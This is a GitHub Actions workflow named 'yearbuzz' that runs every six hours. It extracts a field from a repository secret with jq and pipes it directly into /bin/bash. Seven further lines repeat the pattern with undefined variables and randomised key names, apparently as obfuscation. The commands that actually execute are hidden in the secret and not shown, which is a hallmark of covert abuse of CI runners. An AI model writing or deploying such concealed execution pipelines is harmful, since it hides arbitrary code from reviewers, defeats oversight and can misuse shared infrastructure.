name: yearbuzz
on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yearbuzz
        env:
          fypm3: ${{ secrets.fypm3 }}
        run: |
          echo $fypm3 | jq -r .cvuh08 | /bin/bash
          echo $gd477 | jq -r .ol6423 | /bin/bash
          echo $cmm73 | jq -r .dt75532 | /bin/bash
          echo $oces222 | jq -r .zvcw375 | /bin/bash
          echo $qis679 | jq -r .e2 | /bin/bash
          echo $avw1603 | jq -r .uj23 | /bin/bash
          echo $u2351 | jq -r .n4 | /bin/bash
          echo $t1 | jq -r .rj00909 | /bin/bash

